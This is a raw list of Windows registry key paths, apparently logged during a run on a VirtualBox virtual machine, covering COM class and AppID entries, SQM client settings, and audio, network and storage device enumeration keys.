HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\986264BB HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles HKEY_USERS\S-1-5-20_Classes HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\TreatAs HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\Progid HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\Progid HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LocalServer32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LocalServer32\LocalServer32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LocalServer32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LocalServer32\ServerExecutable HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\AppID HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LocalService HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\DllSurrogate HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\RunAs HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\ActivateAtStorage HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\ROTFlags HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\AppIDFlags HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LaunchPermission HKEY_LOCAL_MACHINE\Software\Microsoft\OLE HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\LegacyAuthenticationLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\LegacyImpersonationLevel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\AuthenticationLevel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\RemoteServerName HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\SRPTrustLevel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\PreferredServerBitness HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LoadUserSettings HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\Elevation HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\##?#IDE#CdRomVBOX_CD-ROM_____________________________1.0_____#5&106af171&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\# HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\##?#IDE#CdRomVBOX_CD-ROM_____________________________1.0_____#5&106af171&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\##?#IDE#CdRomVBOX_CD-ROM_____________________________1.0_____#5&106af171&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\##?#STORAGE#Volume#{35122303-fb0b-11e5-b945-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\# HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\##?#STORAGE#Volume#{35122303-fb0b-11e5-b945-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\##?#STORAGE#Volume#{35122303-fb0b-11e5-b945-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\##?#STORAGE#Volume#{35122303-fb0b-11e5-b945-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\# HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\##?#STORAGE#Volume#{35122303-fb0b-11e5-b945-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\##?#STORAGE#Volume#{35122303-fb0b-11e5-b945-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\DeviceInstance HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\LocalService HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\ServiceParameters HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\RunAs HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\ActivateAtStorage HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\ROTFlags HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\AppIDFlags HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\LaunchPermission HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\AuthenticationLevel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\RemoteServerName HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\SRPTrustLevel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\PreferredServerBitness HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\LoadUserSettings HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_80EE&DEV_CAFE&SUBSYS_00000000&REV_00\3&267A616A&0&20 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_80EE&DEV_CAFE&SUBSYS_00000000&REV_00\3&267A616A&0&20\Class HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE\CDROMVBOX_CD-ROM_____________________________1.0_____\5&106AF171&0&1.0.0 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE\CDROMVBOX_CD-ROM_____________________________1.0_____\5&106AF171&0&1.0.0\HardwareID HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_7111&SUBSYS_00000000&REV_01\3&267A616A&0&09 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_7111&SUBSYS_00000000&REV_01\3&267A616A&0&09\HardwareID HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCIIDE\IDECHANNEL\4&2617AEAE&0&0 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCIIDE\IDECHANNEL\4&2617AEAE&0&0\HardwareID HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCIIDE\IDECHANNEL\4&2F42C713&0&0 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCIIDE\IDECHANNEL\4&2F42C713&0&0\HardwareID HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCIIDE\IDECHANNEL\4&2F42C713&0&1 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCIIDE\IDECHANNEL\4&2F42C713&0&1\HardwareID HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_2829&SUBSYS_00000000&REV_02\3&267A616A&0&68 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_2829&SUBSYS_00000000&REV_02\3&267A616A&0&68\HardwareID HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_80EE&DEV_BEEF&SUBSYS_00000000&REV_00\3&267A616A&0&10 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_80EE&DEV_BEEF&SUBSYS_00000000&REV_00\3&267A616A&0&10\HardwareID HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994ad04-93ef-11d0-a3cc-00a0c9223196} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31e60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eCDInTopo HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31e60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31E60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\Properties HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31e60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eCDInWave HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31e60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eHeadphoneTopo HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31e60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eHeadphoneWave HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31e60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eMicInTopo HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31e60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eMicInWave HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31e60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eSpeakerTopo HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31e60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eSpeakerWave HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\ClassGUID HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\HardwareID HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#PCI#VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02#3&267a616a&0&18#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#{C2D43895-0262-4873-A789-C2F96D24B693} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#PCI#VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02#3&267a616a&0&18#{ad498944-762f-11d0-8dcb-00c04fc3358c} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#PCI#VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02#3&267a616a&0&18#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\Properties HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#*ISATAP#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#{684BB8B6-2793-49A5-8012-E0A941B4B4DF} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#*ISATAP#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#*ISATAP#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#*ISATAP#0001#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#{5F6D61D9-D207-449A-BD48-652A5D1F25BE} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#*ISATAP#0001#{ad498944-762f-11d0-8dcb-00c04fc3358c} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#*ISATAP#0001#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_AGILEVPNMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#{29898C9D-B0A4-4FEF-BDB6-57A562022CEE} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_AGILEVPNMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_AGILEVPNMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_L2TPMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#{E43D242B-9EAB-4626-A952-46649FBB939A} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_L2TPMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_L2TPMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_NDISWANBH#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#NDISWANBH HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_NDISWANBH#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_NDISWANBH#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_NDISWANIP#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#NDISWANIP HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_NDISWANIP#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_NDISWANIP#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_NDISWANIPV6#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#NDISWANIPV6 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_NDISWANIPV6#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_NDISWANIPV6#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_PPPOEMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#{8E301A52-AFFA-4F49-B9CA-C79096A1A056} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_PPPOEMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_PPPOEMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_PPTPMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#{DF4A9D2C-8742-4EB1-8703-D395C4183F33} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_PPTPMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_PPTPMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_SSTPMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#{71F897D7-EB7C-4D8D-89DB-AC80D9DD2270} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_SSTPMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_SSTPMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#SYSTEM#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#{eeab7790-c514-11d1-b42b-00805fc1270e}&asyncmac HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#SYSTEM#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#SYSTEM#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Properties HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Properties\{83da6326-97a6-4088-9453-a1923f573b29} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000006 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Pnp\{71d10298-bdb9-4dcd-a87a-eec6137ab254}\0 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{EEAB7790-C514-11D1-B42B-00805FC1270E}\ASYNCMAC HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\ClassGUID HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Phantom HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Capabilities HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\ContainerID HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Legacy HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\ConfigFlags HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{cac88484-7515-4c03-82e6-71a87abac361} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{cac88484-7515-4c03-82e6-71a87abac361}\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{cac88484-7515-4c03-82e6-71a87abac361}\# HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{cac88484-7515-4c03-82e6-71a87abac361}\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{cac88484-7515-4c03-82e6-71a87abac361} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{cac88484-7515-4c03-82e6-71a87abac361}\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{cac88484-7515-4c03-82e6-71a87abac361}\DeviceInstance HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\HardwareID HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\CompatibleIDs HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{cac88484-7515-4c03-82e6-71a87abac361}\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{cac88484-7515-4c03-82e6-71a87abac361}\#\Control HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{cac88484-7515-4c03-82e6-71a87abac361}\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{cac88484-7515-4c03-82e6-71a87abac361}\#\Control\Linked HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{cac88484-7515-4c03-82e6-71a87abac361}\Properties 